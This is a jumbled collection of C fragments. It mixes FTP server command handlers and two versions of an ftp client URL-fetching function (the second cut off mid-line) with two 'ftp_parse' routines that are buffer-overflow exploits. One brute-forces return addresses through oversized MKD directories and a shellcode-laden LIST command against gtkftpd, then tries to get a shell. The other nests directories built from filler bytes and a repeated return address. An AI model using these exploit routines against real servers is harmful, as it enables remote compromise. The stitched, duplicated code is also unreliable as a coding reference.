void ftp_clean(int sock){
ftp_printf(sock,"CWD ..\r\n");
ftp_read(sock);
ftp_printf(sock,"RMD %s\r\n",basedir);
ftp_read(sock);
ftp_printf(sock,"QUIT\r\n");
ftp_read(sock);
return;
}
int parse_ftp_command(ftp_session *s, char *command)
{
int i, cmd, ret;
#ifdef DEBUG
if (logging_enabled)
{
char buf[MAX_FTP_COMMAND];
sprintf(buf, "<--- %s", command);
log(buf);
}
#endif
s->prev_command = s->curr_command;
s->curr_command = cmd = get_command(ftp_command, command);
if (cmd == cmd_INVALID)
ret = 500;
else
ret = ftp_handler[cmd](s, command + strlen(ftp_command[cmd]));
if (ret != 0)
{
for (i = 0; reply_code[i].code != 0; i++)
if (reply_code[i].code == ret)
break;
ftp_printf(s->control, "%03d %s\r\n", ret, reply_code[i].text);
}
return 0;
}
int do_MKD(ftp_session *s, char *param)
{
int len;
char arg[MAX_FTP_PATH], ftp_dir[MAX_FTP_PATH], fs_dir[MAX_FTP_PATH];
MATCH_SP(param);
len = get_string(param, arg, sizeof(arg));
if (len == 0)
return 501;
param += len;
MATCH_CRLF(param);
if (readonly)
return 550;
if (!parse_dir(s->dir, arg, ftp_dir))
return 550;
if (!ftp_to_fs(ftp_dir, fs_dir))
return 550;
if (!CreateDirectory(fs_dir, NULL))
return 550;
ftp_printf(s->control, "257 \"%s\" created.\r\n", arg);
return 0;
}
int do_RNFR(ftp_session *s, char *param)
{
int len;
char arg[MAX_FTP_PATH], ftp_path[MAX_FTP_PATH];
s->curr_command = cmd_NOOP;
MATCH_SP(param);
len = get_string(param, arg, sizeof(arg));
if (len == 0)
return 501;
param += len;
MATCH_CRLF(param);
if (readonly)
return 550;
if (!parse_dir(s->dir, arg, ftp_path))
return 550;
if (!ftp_to_fs(ftp_path, arg))
return 550;
if (!(is_file_exists(arg) || is_dir_exists(arg)))
return 550;
s->curr_command = cmd_RNFR;
strcpy(s->rename, arg);
ftp_printf(s->control, "350 File exists, ready for destination name.\r\n");
return 0;
}
void ftp_parse(int sock){
unsigned int offset=0;
ftp_read(sock); /* get the banner. */
ftp_printf(sock,"USER %s\r\n",user);
ftp_read(sock);
ftp_printf(sock,"PASS %s\r\n",pass);
ftp_read(sock);
ftp_printf(sock,"CWD %s\r\n",writedir);
ftp_read(sock);
basedir=getbdir(); /* tmp dir of our own to use. */
ftp_printf(sock,"MKD %s\r\n",basedir);
ftp_read(sock);
ftp_printf(sock,"CWD %s\r\n",basedir);
ftp_read(sock);
while(offset<(attempts*400)){ /* if it hasn't yet, it's not going to. */
/* slight null-byte/CR check, only needs to check the last byte. */
if((!reverse&&!((baseaddr-offset)&0xff))||(reverse&&!((baseaddr+offset)
&0xff))||(!reverse&&((baseaddr-offset)&0xff)=='\n')||(reverse&&
((baseaddr+offset)&0xff)=='\n')){
printf("[!] brute address contains null-byte/CR, increasing offset "
"by one byte.\n");
offset++; /* one byte off if reversed won't hurt here. (401) */
}
/* make the evil oversized directory. (255 or less bytes) */
ftp_printf(sock,"MKD %s\r\n",getdir(offset));
ftp_read(sock);
/* date+directory exceeds 256 byte buffer, the exploit. */
sleep(1); /* delay insurance. */
ftp_printf(sock,"LIST -%s\r\n",getcode());
/* nothing to read here, and gtkftpd processes (the exploit) */
/* before the ftp list connection is made, making it */
/* pointless to view the list. */
sleep(1); /* delay insurance, again, just to be sure. */
/* delete directory, multiples will cause failure(s). */
ftp_printf(sock,"RMD %s\r\n",getdir(offset));
ftp_read(sock);
getshell(sock,offset);
offset+=400; /* always at least 400 nops in a row, in shellcode. */
}
ftp_clean(sock);
close(sock);
return;
}
int do_HELP(ftp_session *s, char *param)
{
char buf[512], *p;
int i;
MATCH_CRLF(param);
p = buf;
strcpy(p, "214-Recognized commands. ( * = not implemented )\r\n");
p += strlen(p);
for (i = 0; ftp_command[i] != 0; i++)
p += sprintf(p, (i+1)%6 == 0 ? " %c%s\r\n" : " %c%-5s",
(ftp_handler[i] == do_NIMP) ? '*' : ' ', ftp_command[i]);
if (i%6 != 0)
p += sprintf(p, "\r\n");
strcpy(p, "214 Command okay.\r\n");
ftp_printf(s->control, buf);
return 0;
}
int do_REST(ftp_session *s, char *param)
{
int len;
char arg[MAX_FTP_COMMAND];
s->curr_command = cmd_NOOP;
MATCH_SP(param);
len = get_number(param, arg, sizeof(arg));
if (len == 0)
return 501;
param += len;
MATCH_CRLF(param);
s->curr_command = cmd_REST;
s->restart = atoi(arg);
ftp_printf(s->control, "350 Restarting at %d.\r\n", s->restart);
return 0;
}
void ftp_parse(int ftpsd){
char *buf4;
char *bux;
if(!(buf4=(char *)malloc(141+1)))
printe(" allocating memory failed.",1);
if(!(bux=(char *)malloc(56+1)))
printe(" allocating memory failed.",1);
unsigned int offset=0;
unsigned int i=0;
memset(buf4, 0x42 , 141);
for(i=0;i<56;i+=4){*(long *)&bux[i]=jretaddr;}
ftp_read(ftpsd); /* get the banner. */
ftp_printf(ftpsd,"USER %s\r\n",user);
ftp_read(ftpsd);
ftp_printf(ftpsd,"PASS %s\r\n",pass);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",writedir);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",bux);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",bux);
ftp_read(ftpsd);
sleep(10);
close(ftpsd);
}
/*
* Retrieve URL, via the proxy in $proxyvar if necessary.
* Modifies the string argument given.
* Returns -1 on failure, 0 on success
*/
static int
url_get(const char *origline, const char *proxyenv, const char *outfile)
{
char pbuf[NI_MAXSERV], hbuf[NI_MAXHOST], *cp, *portnum, *path, ststr[4];
char *hosttail, *cause = "unknown", *newline, *host, *port, *buf = NULL;
int error, i, isftpurl = 0, isfileurl = 0, isredirect = 0, rval = -1;
struct addrinfo hints, *res0, *res;
const char * volatile savefile;
char * volatile proxyurl = NULL;
char *cookie = NULL;
volatile int s = -1, out;
volatile sig_t oldintr;
FILE *fin = NULL;
off_t hashbytes;
const char *errstr;
size_t len, wlen;
#ifndef SMALL
char *sslpath = NULL, *sslhost = NULL;
int ishttpsurl = 0;
SSL_CTX *ssl_ctx = NULL;
#endif /* !SMALL */
SSL *ssl = NULL;
int status;
newline = strdup(origline);
if (newline == NULL)
errx(1, "Can't allocate memory to parse URL");
if (strncasecmp(newline, HTTP_URL, sizeof(HTTP_URL) - 1) == 0)
host = newline + sizeof(HTTP_URL) - 1;
else if (strncasecmp(newline, FTP_URL, sizeof(FTP_URL) - 1) == 0) {
host = newline + sizeof(FTP_URL) - 1;
isftpurl = 1;
} else if (strncasecmp(newline, FILE_URL, sizeof(FILE_URL) - 1) == 0) {
host = newline + sizeof(FILE_URL) - 1;
isfileurl = 1;
#ifndef SMALL
} else if (strncasecmp(newline, HTTPS_URL, sizeof(HTTPS_URL) - 1) == 0) {
host = newline + sizeof(HTTPS_URL) - 1;
ishttpsurl = 1;
#endif /* !SMALL */
} else
errx(1, "url_get: Invalid URL '%s'", newline);
if (isfileurl) {
path = host;
} else {
path = strchr(host, '/'); /* find path */
if (EMPTYSTRING(path)) {
if (isftpurl)
goto noftpautologin;
warnx("Invalid URL (no `/' after host): %s", origline);
goto cleanup_url_get;
}
*path++ = '\0';
if (EMPTYSTRING(path)) {
if (isftpurl)
goto noftpautologin;
warnx("Invalid URL (no file after host): %s", origline);
goto cleanup_url_get;
}
}
if (outfile)
savefile = outfile;
else
savefile = basename(path);
#ifndef SMALL
if (resume && (strcmp(savefile, "-") == 0)) {
warnx("can't append to stdout");
goto cleanup_url_get;
}
#endif /* !SMALL */
if (EMPTYSTRING(savefile)) {
if (isftpurl)
goto noftpautologin;
warnx("Invalid URL (no file after directory): %s", origline);
goto cleanup_url_get;
}
if (!isfileurl && proxyenv != NULL) { /* use proxy */
#ifndef SMALL
if (ishttpsurl) {
sslpath = strdup(path);
sslhost = strdup(host);
if (! sslpath || ! sslhost)
errx(1, "Can't allocate memory for https path/host.");
}
#endif /* !SMALL */
proxyurl = strdup(proxyenv);
if (proxyurl == NULL)
errx(1, "Can't allocate memory for proxy URL.");
if (strncasecmp(proxyurl, HTTP_URL, sizeof(HTTP_URL) - 1) == 0)
host = proxyurl + sizeof(HTTP_URL) - 1;
else if (strncasecmp(proxyurl, FTP_URL, sizeof(FTP_URL) - 1) == 0)
host = proxyurl + sizeof(FTP_URL) - 1;
else {
warnx("Malformed proxy URL: %s", proxyenv);
goto cleanup_url_get;
}
if (EMPTYSTRING(host)) {
warnx("Malformed proxy URL: %s", proxyenv);
goto cleanup_url_get;
}
*--path = '/'; /* add / back to real path */
path = strchr(host, '/'); /* remove trailing / on host */
if (!EMPTYSTRING(path))
*path++ = '\0'; /* i guess this ++ is useless */
path = strchr(host, '@'); /* look for credentials in proxy */
if (!EMPTYSTRING(path)) {
*path++ = '\0';
cookie = strchr(host, ':');
if (EMPTYSTRING(cookie)) {
warnx("Malformed proxy URL: %s", proxyenv);
goto cleanup_url_get;
}
cookie = malloc(COOKIE_MAX_LEN);
b64_ntop(host, strlen(host), cookie, COOKIE_MAX_LEN);
/*
* This removes the password from proxyenv,
* filling with stars
*/
for (host = strchr(proxyenv + 5, ':'); *host != '@';
host++)
*host = '*';
host = path;
}
path = newline;
}
if (isfileurl) {
struct stat st;
s = open(path, O_RDONLY);
if (s == -1) {
warn("Can't open file %s", path);
goto cleanup_url_get;
}
if (fstat(s, &st) == -1)
filesize = -1;
else
filesize = st.st_size;
/* Open the output file. */
if (strcmp(savefile, "-") != 0) {
#ifndef SMALL
if (resume)
out = open(savefile, O_APPEND | O_WRONLY);
else
#endif /* !SMALL */
out = open(savefile, O_CREAT | O_WRONLY |
O_TRUNC, 0666);
if (out < 0) {
warn("Can't open %s", savefile);
goto cleanup_url_get;
}
} else
out = fileno(stdout);
#ifndef SMALL
if (resume) {
if (fstat(out, &st) == -1) {
warn("Can't fstat %s", savefile);
goto cleanup_url_get;
}
if (lseek(s, st.st_size, SEEK_SET) == -1) {
warn("Can't lseek %s", path);
goto cleanup_url_get;
}
restart_point = st.st_size;
}
#endif /* !SMALL */
/* Trap signals */
oldintr = NULL;
if (setjmp(httpabort)) {
if (oldintr)
(void)signal(SIGINT, oldintr);
goto cleanup_url_get;
}
oldintr = signal(SIGINT, abortfile);
bytes = 0;
hashbytes = mark;
progressmeter(-1);
if ((buf = malloc(4096)) == NULL)
errx(1, "Can't allocate memory for transfer buffer");
/* Finally, suck down the file. */
i = 0;
while ((len = read(s, buf, 4096)) > 0) {
bytes += len;
for (cp = buf; len > 0; len -= i, cp += i) {
if ((i = write(out, cp, len)) == -1) {
warn("Writing %s", savefile);
goto cleanup_url_get;
}
else if (i == 0)
break;
}
if (hash && !progress) {
while (bytes >= hashbytes) {
(void)putc('#', ttyout);
hashbytes += mark;
}
(void)fflush(ttyout);
}
}
if (hash && !progress && bytes > 0) {
if (bytes < mark)
(void)putc('#', ttyout);
(void)putc('\n', ttyout);
(void)fflush(ttyout);
}
if (len != 0) {
warn("Reading from file");
goto cleanup_url_get;
}
progressmeter(1);
if (verbose)
fputs("Successfully retrieved file.\n", ttyout);
(void)signal(SIGINT, oldintr);
rval = 0;
goto cleanup_url_get;
}
if (*host == '[' && (hosttail = strrchr(host, ']')) != NULL &&
(hosttail[1] == '\0' || hosttail[1] == ':')) {
host++;
*hosttail++ = '\0';
} else
hosttail = host;
portnum = strrchr(hosttail, ':'); /* find portnum */
if (portnum != NULL)
*portnum++ = '\0';
#ifndef SMALL
if (debug)
fprintf(ttyout, "host %s, port %s, path %s, save as %s.\n",
host, portnum, path, savefile);
#endif /* !SMALL */
memset(&hints, 0, sizeof(hints));
hints.ai_family = family;
hints.ai_socktype = SOCK_STREAM;
#ifndef SMALL
port = portnum ? portnum : (ishttpsurl ? httpsport : httpport);
#else /* !SMALL */
port = portnum ? portnum : httpport;
#endif /* !SMALL */
error = getaddrinfo(host, port, &hints, &res0);
/*
* If the services file is corrupt/missing, fall back
* on our hard-coded defines.
*/
if (error == EAI_SERVICE && port == httpport) {
snprintf(pbuf, sizeof(pbuf), "%d", HTTP_PORT);
error = getaddrinfo(host, pbuf, &hints, &res0);
#ifndef SMALL
} else if (error == EAI_SERVICE && port == httpsport) {
snprintf(pbuf, sizeof(pbuf), "%d", HTTPS_PORT);
error = getaddrinfo(host, pbuf, &hints, &res0);
#endif /* !SMALL */
}
if (error) {
warnx("%s: %s", gai_strerror(error), host);
goto cleanup_url_get;
}
s = -1;
for (res = res0; res; res = res->ai_next) {
if (getnameinfo(res->ai_addr, res->ai_addrlen, hbuf,
sizeof(hbuf), NULL, 0, NI_NUMERICHOST) != 0)
strlcpy(hbuf, "(unknown)", sizeof(hbuf));
if (verbose)
fprintf(ttyout, "Trying %s...\n", hbuf);
s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
if (s == -1) {
cause = "socket";
continue;
}
again:
if (connect(s, res->ai_addr, res->ai_addrlen) < 0) {
int save_errno;
if (errno == EINTR)
goto again;
save_errno = errno;
close(s);
errno = save_errno;
s = -1;
cause = "connect";
continue;
}
/* get port in numeric */
if (getnameinfo(res->ai_addr, res->ai_addrlen, NULL, 0,
pbuf, sizeof(pbuf), NI_NUMERICSERV) == 0)
port = pbuf;
else
port = NULL;
#ifndef SMALL
if (proxyenv && sslhost)
proxy_connect(s, sslhost);
#endif /* !SMALL */
break;
}
freeaddrinfo(res0);
if (s < 0) {
warn("%s", cause);
goto cleanup_url_get;
}
#ifndef SMALL
if (ishttpsurl) {
if (proxyenv && sslpath) {
ishttpsurl = 0;
proxyurl = NULL;
path = sslpath;
}
SSL_library_init();
SSL_load_error_strings();
SSLeay_add_ssl_algorithms();
ssl_ctx = SSL_CTX_new(SSLv23_client_method());
ssl = SSL_new(ssl_ctx);
if (ssl == NULL || ssl_ctx == NULL) {
ERR_print_errors_fp(ttyout);
goto cleanup_url_get;
}
if (SSL_set_fd(ssl, s) == 0) {
ERR_print_errors_fp(ttyout);
goto cleanup_url_get;
}
if (SSL_connect(ssl) <= 0) {
ERR_print_errors_fp(ttyout);
goto cleanup_url_get;
}
} else {
fin = fdopen(s, "r+");
}
#else /* !SMALL */
fin = fdopen(s, "r+");
#endif /* !SMALL */
if (verbose)
fprintf(ttyout, "Requesting %s", origline);
/*
* Construct and send the request. Proxy requests don't want leading /.
*/
#ifndef SMALL
cookie_get(host, path, ishttpsurl, &buf);
#endif /* !SMALL */
if (proxyurl) {
if (verbose)
fprintf(ttyout, " (via %s)\n", proxyenv);
/*
* Host: directive must use the destination host address for
* the original URI (path). We do not attach it at this moment.
*/
if (cookie)
ftp_printf(fin, ssl, "GET %s HTTP/1.0\r\n"
"Proxy-Authorization: Basic %s%s\r\n%s\r\n\r\n",
path, cookie, buf ? buf : "", HTTP_USER_AGENT);
else
ftp_printf(fin, ssl, "GET %s HTTP/1.0\r\n%s%s\r\n\r\n",
path, buf ? buf : "", HTTP_USER_AGENT);
} else {
ftp_printf(fin, ssl, "GET /%s %s\r\nHost: ", path,
#ifndef SMALL
resume ? "HTTP/1.1" :
#endif /* !SMALL */
"HTTP/1.0");
if (strchr(host, ':')) {
char *h, *p;
/*
* strip off scoped address portion, since it's
* local to node
*/
h = strdup(host);
if (h == NULL)
errx(1, "Can't allocate memory.");
if ((p = strchr(h, '%')) != NULL)
*p = '\0';
ftp_printf(fin, ssl, "[%s]", h);
free(h);
} else
ftp_printf(fin, ssl, "%s", host);
/*
* Send port number only if it's specified and does not equal
* 80. Some broken HTTP servers get confused if you explicitly
* send them the port number.
*/
#ifndef SMALL
if (port && strcmp(port, (ishttpsurl ? "443" : "80")) != 0)
ftp_printf(fin, ssl, ":%s", port);
if (resume) {
int ret;
struct stat stbuf;
ret = stat(savefile, &stbuf);
if (ret < 0) {
if (verbose)
fprintf(ttyout, "\n");
warn("Can't open %s", savefile);
goto cleanup_url_get;
}
restart_point = stbuf.st_size;
ftp_printf(fin, ssl, "\r\nRange: bytes=%lld-",
(long long)restart_point);
}
#else /* !SMALL */
if (port && strcmp(port, "80") != 0)
ftp_printf(fin, ssl, ":%s", port);
#endif /* !SMALL */
ftp_printf(fin, ssl, "\r\n%s%s\r\n\r\n",
buf ? buf : "", HTTP_USER_AGENT);
if (verbose)
fprintf(ttyout, "\n");
}
#ifndef SMALL
free(buf);
#endif /* !SMALL */
buf = NULL;
if (fin != NULL && fflush(fin) == EOF) {
warn("Writing HTTP request");
goto cleanup_url_get;
}
if ((buf = ftp_readline(fin, ssl, &len)) == NULL) {
warn("Receiving HTTP reply");
goto cleanup_url_get;
}
while (len > 0 && (buf[len-1] == '\r' || buf[len-1] == '\n'))
buf[--len] = '\0';
#ifndef SMALL
if (debug)
fprintf(ttyout, "received '%s'\n", buf);
#endif /* !SMALL */
cp = strchr(buf, ' ');
if (cp == NULL)
goto improper;
else
cp++;
strlcpy(ststr, cp, sizeof(ststr));
status = strtonum(ststr, 200, 416, &errstr);
if (errstr) {
warnx("Error retrieving file: %s", cp);
goto cleanup_url_get;
}
switch (status) {
case 200: /* OK */
#ifndef SMALL
case 206: /* Partial Content */
break;
#endif /* !SMALL */
case 301: /* Moved Permanently */
case 302: /* Found */
case 303: /* See Other */
case 307: /* Temporary Redirect */
isredirect++;
if (redirect_loop++ > 10) {
warnx("Too many redirections requested");
goto cleanup_url_get;
}
break;
#ifndef SMALL
case 416: /* Requested Range Not Satisfiable */
warnx("File is already fully retrieved.");
goto cleanup_url_get;
#endif /* !SMALL */
default:
warnx("Error retrieving file: %s", cp);
goto cleanup_url_get;
}
/*
* Read the rest of the header.
*/
free(buf);
filesize = -1;
for (;;) {
if ((buf = ftp_readline(fin, ssl, &len)) == NULL) {
warn("Receiving HTTP reply");
goto cleanup_url_get;
}
while (len > 0 && (buf[len-1] == '\r' || buf[len-1] == '\n'))
buf[--len] = '\0';
if (len == 0)
break;
#ifndef SMALL
if (debug)
fprintf(ttyout, "received '%s'\n", buf);
#endif /* !SMALL */
/* Look for some headers */
cp = buf;
#define CONTENTLEN "Content-Length: "
if (strncasecmp(cp, CONTENTLEN, sizeof(CONTENTLEN) - 1) == 0) {
cp += sizeof(CONTENTLEN) - 1;
filesize = strtonum(cp, 0, LLONG_MAX, &errstr);
if (errstr != NULL)
goto improper;
#ifndef SMALL
if (resume)
filesize += restart_point;
#endif /* !SMALL */
#define LOCATION "Location: "
} else if (isredirect &&
strncasecmp(cp, LOCATION, sizeof(LOCATION) - 1) == 0) {
cp += sizeof(LOCATION) - 1;
if (verbose)
fprintf(ttyout, "Redirected to %s\n", cp);
if (fin != NULL)
fclose(fin);
else if (s != -1)
close(s);
free(proxyurl);
free(newline);
rval = url_get(cp, proxyenv, outfile);
free(buf);
return (rval);
}
}
/* Open the output file. */
if (strcmp(savefile, "-") != 0) {
#ifndef SMALL
if (resume)
out = open(savefile, O_APPEND | O_WRONLY);
else
#endif /* !SMALL */
out = open(savefile, O_CREAT | O_WRONLY | O_TRUNC,
0666);
if (out < 0) {
warn("Can't open %s", savefile);
goto cleanup_url_get;
}
} else
out = fileno(stdout);
/* Trap signals */
oldintr = NULL;
if (setjmp(httpabort)) {
if (oldintr)
(void)signal(SIGINT, oldintr);
goto cleanup_url_get;
}
oldintr = signal(SIGINT, aborthttp);
bytes = 0;
hashbytes = mark;
progressmeter(-1);
free(buf);
/* Finally, suck down the file. */
if ((buf = malloc(4096)) == NULL)
errx(1, "Can't allocate memory for transfer buffer");
i = 0;
len = 1;
while (len > 0) {
len = ftp_read(fin, ssl, buf, 4096);
bytes += len;
for (cp = buf, wlen = len; wlen > 0; wlen -= i, cp += i) {
if ((i = write(out, cp, wlen)) == -1) {
warn("Writing %s", savefile);
goto cleanup_url_get;
}
else if (i == 0)
break;
}
if (hash && !progress) {
while (bytes >= hashbytes) {
(void)putc('#', ttyout);
hashbytes += mark;
}
(void)fflush(ttyout);
}
}
if (hash && !progress && bytes > 0) {
if (bytes < mark)
(void)putc('#', ttyout);
(void)putc('\n', ttyout);
(void)fflush(ttyout);
}
if (len != 0) {
warn("Reading from socket");
goto cleanup_url_get;
}
progressmeter(1);
if (
#ifndef SMALL
!resume &&
#endif /* !SMALL */
filesize != -1 && len == 0 && bytes != filesize) {
if (verbose)
fputs("Read short file.\n", ttyout);
goto cleanup_url_get;
}
if (verbose)
fputs("Successfully retrieved file.\n", ttyout);
(void)signal(SIGINT, oldintr);
rval = 0;
goto cleanup_url_get;
noftpautologin:
warnx(
"Auto-login using ftp URLs isn't supported when using $ftp_proxy");
goto cleanup_url_get;
improper:
warnx("Improper response from %s", host);
cleanup_url_get:
#ifndef SMALL
if (ssl) {
SSL_shutdown(ssl);
SSL_free(ssl);
}
#endif /* !SMALL */
if (fin != NULL)
fclose(fin);
else if (s != -1)
close(s);
free(buf);
free(proxyurl);
free(newline);
return (rval);
}
/*
* Retrieve URL, via the proxy in $proxyvar if necessary.
* Modifies the string argument given.
* Returns -1 on failure, 0 on success
*/
static int
url_get(const char *origline, const char *proxyenv, const char *outfile)
{
char pbuf[NI_MAXSERV], hbuf[NI_MAXHOST], *cp, *portnum, *path, ststr[4];
char *hosttail, *cause = "unknown", *newline, *host, *port, *buf = NULL;
char *epath, *redirurl, *loctail, *h, *p;
int error, i, isftpurl = 0, isfileurl = 0, isredirect = 0, rval = -1;
struct addrinfo hints, *res0, *res, *ares = NULL;
const char * volatile savefile;
char * volatile proxyurl = NULL;
char *cookie = NULL;
volatile int s = -1, out;
volatile sig_t oldintr, oldinti;
FILE *fin = NULL;
off_t hashbytes;
const char *errstr;
ssize_t len, wlen;
#ifndef SMALL
char *sslpath = NULL, *sslhost = NULL;
char *locbase, *full_host = NULL, *auth = NULL;
const char *scheme;
int ishttpsurl = 0;
SSL_CTX *ssl_ctx = NULL;
#endif /* !SMALL */
SSL *ssl = NULL;
int status;
int save_errno;
const size_t buflen = 128 * 1024;
direction = "received";
newline = strdup(origline);
if (newline == NULL)
errx(1, "Can't allocate memory to parse URL");
if (strncasecmp(newline, HTTP_URL, sizeof(HTTP_URL) - 1) == 0) {
host = newline + sizeof(HTTP_URL) - 1;
#ifndef SMALL
scheme = HTTP_URL;
#endif /* !SMALL */
} else if (strncasecmp(newline, FTP_URL, sizeof(FTP_URL) - 1) == 0) {
host = newline + sizeof(FTP_URL) - 1;
isftpurl = 1;
#ifndef SMALL
scheme = FTP_URL;
#endif /* !SMALL */
} else if (strncasecmp(newline, FILE_URL, sizeof(FILE_URL) - 1) == 0) {
host = newline + sizeof(FILE_URL) - 1;
isfileurl = 1;
#ifndef SMALL
scheme = FILE_URL;
} else if (strncasecmp(newline, HTTPS_URL, sizeof(HTTPS_URL) - 1) == 0) {
host = newline + sizeof(HTTPS_URL) - 1;
ishttpsurl = 1;
scheme = HTTPS_URL;
#endif /* !SMALL */
} else
errx(1, "url_get: Invalid URL '%s'", newline);
if (isfileurl) {
path = host;
} else {
path = strchr(host, '/'); /* Find path */
if (EMPTYSTRING(path)) {
if (outfile) { /* No slash, but */
path=strchr(host,'\0'); /* we have outfile. */
goto noslash;
}
if (isftpurl)
goto noftpautologin;
warnx("No `/' after host (use -o): %s", origline);
goto cleanup_url_get;
}
*path++ = '\0';
if (EMPTYSTRING(path) && !outfile) {
if (isftpurl)
goto noftpautologin;
warnx("No filename after host (use -o): %s", origline);
goto cleanup_url_get;
}
}
noslash:
#ifndef SMALL
/*
* Look for auth header in host, since now host does not
* contain the path. Basic auth from RFC 2617, valid
* characters for path are in RFC 3986 section 3.3.
*/
if (proxyenv == NULL &&
(!strcmp(scheme, HTTP_URL) || !strcmp(scheme, HTTPS_URL))) {
if ((p = strchr(host, '@')) != NULL) {
size_t authlen = (strlen(host) + 5) * 4 / 3;
*p = 0; /* Kill @ */
if ((auth = malloc(authlen)) == NULL)
err(1, "Can't allocate memory for "
"authorization");
if (b64_ntop(host, strlen(host),
auth, authlen) == -1)
errx(1, "error in base64 encoding");
host = p + 1;
}
}
#endif /* SMALL */
if (outfile)
savefile = outfile;
else {
if (path[strlen(path) - 1] == '/') /* Consider no file */
savefile = NULL; /* after dir invalid. */
else
savefile = basename(path);
}
if (EMPTYSTRING(savefile)) {
if (isftpurl)
goto noftpautologin;
warnx("No filename after directory (use -o): %s", origline);
goto cleanup_url_get;
}
#ifndef SMALL
if (resume && pipeout) {
warnx("can't append to stdout");
goto cleanup_url_get;
}
#endif /* !SMALL */
if (!isfileurl && proxyenv != NULL) { /* use proxy */
#ifndef SMALL
if (ishttpsurl) {
sslpath = strdup(path);
sslhost = strdup(host);
if (! sslpath || ! sslhost)
errx(1, "Can't allocate memory for https path/host.");
}
#endif /* !SMALL */
proxyurl = strdup(proxyenv);
if (proxyurl == NULL)
errx(1, "Can't allocate memory for proxy URL.");
if (strncasecmp(proxyurl, HTTP_URL, sizeof(HTTP_URL) - 1) == 0)
host = proxyurl + sizeof(HTTP_URL) - 1;
else if (strncasecmp(proxyurl, FTP_URL, sizeof(FTP_URL) - 1) == 0)
host = proxyurl + sizeof(FTP_URL) - 1;
else {
warnx("Malformed proxy URL: %s", proxyenv);
goto cleanup_url_get;
}
if (EMPTYSTRING(host)) {
warnx("Malformed proxy URL: %s", proxyenv);
goto cleanup_url_get;
}
if (*--path == '\0')
*path = '/'; /* add / back to real path */
path = strchr(host, '/'); /* remove trailing / on host */
if (!EMPTYSTRING(path))
*path++ = '\0'; /* i guess this ++ is useless */
path = strchr(host, '@'); /* look for credentials in proxy */
if (!EMPTYSTRING(path)) {
*path = '\0';
cookie = strchr(host, ':');
if (EMPTYSTRING(cookie)) {
warnx("Malformed proxy URL: %s", proxyenv);
goto cleanup_url_get;
}
cookie = malloc(COOKIE_MAX_LEN);
if (cookie == NULL)
errx(1, "out of memory");
if (b64_ntop(host, strlen(host), cookie, COOKIE_MAX_LEN) == -1)
errx(1, "error in base64 encoding");
*path = '@'; /* restore @ in proxyurl */
/*
* This removes the password from proxyurl,
* filling with stars
*/
for (host = 1 + strchr(proxyurl + 5, ':'); *host != '@';
host++)
*host = '*';
host = path + 1;
}
path = newline;
}
if (isfileurl) {
struct stat st;
s = open(path, O_RDONLY);
if (s == -1) {
warn("Can't open file %s", path);
goto cleanup_url_get;
}
if (fstat(s, &st) == -1)
filesize = -1;
else
filesize = st.st_size;
/* Open the output file. */
if (!pipeout) {
#ifndef SMALL
if (resume)
out = open(savefile, O_CREAT | O_WRONLY |
O_APPEND, 0666);
else
#endif /* !SMALL */
out = open(savefile, O_CREAT | O_WRONLY |
O_TRUNC, 0666);
if (out < 0) {
warn("Can't open %s", savefile);
goto cleanup_url_get;
}
} else
out = fileno(stdout);
#ifndef SMALL
if (resume) {
if (fstat(out, &st) == -1) {
warn("Can't fstat %s", savefile);
goto cleanup_url_get;
}
if (lseek(s, st.st_size, SEEK_SET) == -1) {
warn("Can't lseek %s", path);
goto cleanup_url_get;
}
restart_point = st.st_size;
}
#endif /* !SMALL */
/* Trap signals */
oldintr = NULL;
oldinti = NULL;
if (setjmp(httpabort)) {
if (oldintr)
(void)signal(SIGINT, oldintr);
if (oldinti)
(void)signal(SIGINFO, oldinti);
goto cleanup_url_get;
}
oldintr = signal(SIGINT, abortfile);
bytes = 0;
hashbytes = mark;
progressmeter(-1, path);
if ((buf = malloc(buflen)) == NULL)
errx(1, "Can't allocate memory for transfer buffer");
/* Finally, suck down the file. */
i = 0;
oldinti = signal(SIGINFO, psummary);
while ((len = read(s, buf, buflen)) > 0) {
bytes += len;
for (cp = buf; len > 0; len -= i, cp += i) {
if ((i = write(out, cp, len)) == -1) {
warn("Writing %s", savefile);
signal(SIGINFO, oldinti);
goto cleanup_url_get;
}
else if (i == 0)
break;
}
if (hash && !progress) {
while (bytes >= hashbytes) {
(void)putc('#', ttyout);
hashbytes += mark;
}
(void)fflush(ttyout);
}
}
signal(SIGINFO, oldinti);
if (hash && !progress && bytes > 0) {
if (bytes < mark)
(void)putc('#', ttyout);
(void)putc('\n', ttyout);
(void)fflush(ttyout);
}
if (len != 0) {
warn("Reading from file");
goto cleanup_url_get;
}
progressmeter(1, NULL);
if (verbose)
ptransfer(0);
(void)signal(SIGINT, oldintr);
rval = 0;
goto cleanup_url_get;
}
if (*host == '[' && (hosttail = strrchr(host, ']')) != NULL &&
(hosttail[1] == '\0' || hosttail[1] == ':')) {
host++;
*hosttail++ = '\0';
#ifndef SMALL
if (asprintf(&full_host, "[%s]", host) == -1)
errx(1, "Cannot allocate memory for hostname");
#endif /* !SMALL */
} else
hosttail = host;
portnum = strrchr(hosttail, ':'); /* find portnum */
if (portnum != NULL)
*portnum++ = '\0';
#ifndef SMALL
if (full_host == NULL)
